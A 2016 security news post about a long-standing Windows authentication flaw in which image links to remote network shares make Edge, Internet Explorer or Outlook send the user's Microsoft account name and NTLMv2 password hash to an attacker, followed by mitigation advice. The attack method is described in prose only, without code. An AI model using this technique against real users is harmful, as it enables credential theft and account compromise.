Microsoft Live Account Credentials Leaking From Windows 8 And Above - ZVEIL

Microsoft Live Account Credentials Leaking From Windows 8 And Above

by Moritz Walter August 02, 2016

Discovered in 1997 by Aaron Spangler and never fixed, the WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4) is certainly an excellent vintage. In Windows 8 and 10, the same bug has now been found to potentially leak the user’s Microsoft Live account login and (hashed) password information, which is also used to access OneDrive, Outlook, Office, Mobile, Bing, Xbox Live, MSN and Skype (if used with a Microsoft account).

The bug itself seems to be present in all Windows systems since Windows 95 / NT, although only Windows 8 and above are effectively compromised. To see if your machine is affected, you may want to check the public demonstration of the exploit, set up by the guys from [Perfect Privacy] and based on [ValdikSS] original work.

pp-leak-evilhacker
The exploit as demonstrated by Xiaoran Wang et al. in the white paper.

Basically, the default User Authentification Settings of Edge/Spartan (also Internet Explorer, Outlook) lets the browser connect to local network shares, but erroneously fail to block connections to remote shares. To exploit this, an attacker would simply set up a network share. An embedded image link that points to that network share is then sent to the victim, for example as part of an email or website. As soon as the prepped content is viewed inside a Microsoft product such as Edge/Spartan, Internet Explorer or Outlook, that software will try to connect to that share in order to download the image. Doing so, it will silently send the user’s Windows login username in plaintext along with the NTLMv2 hash of the login password to the attacker’s network share.

Even though the original issue exists and is known since more than two decades now, its severity has crept in only lately. Back in 1997, the attacker would have only obtained your local Windows login data, but in Windows 10, the default login method is the user’s Microsoft Live account. An attacker may have to resort to GPU-assisted hash-cracking to retrieve the password from the NTLMv2 hash (or even not), but the result can be as thorough as full compromise, including the mentioned Microsoft services and even remote access.

To mitigate, use a firewall, strengthen your Microsoft Live account password and avoid using Microsoft products such as Edge/Spartan, Internet Explorer (just saying..) and Outlook, as well as VPN connections over IPSec, which may leak VPN credentials in the same way. Firefox and Chrome are not affected.


Filed under: news, security hacks, slider

Moritz Walter
Moritz Walter

Author



Leave a comment

Comments will be approved before showing up.


Also in In The News

9 Things No One Tells You About Breakups

by Razmig Messerian December 09, 2018

It's never easy, but sometimes it's the little things that help you get by.


View Entire Post ›

Continue Reading

David And Emma Pocock Just Got Married Under A Tree, And Wow, I Need To Pinterest It Immediately

by Razmig Messerian December 02, 2018

I can't even with these two.


View Entire Post ›

Continue Reading

Nick Jonas And Priyanka Chopra Just Revealed How They Got Together And It's So Damn Adorable

by Razmig Messerian November 30, 2018

The couple are set to marry in India this weekend.


View Entire Post ›

Continue Reading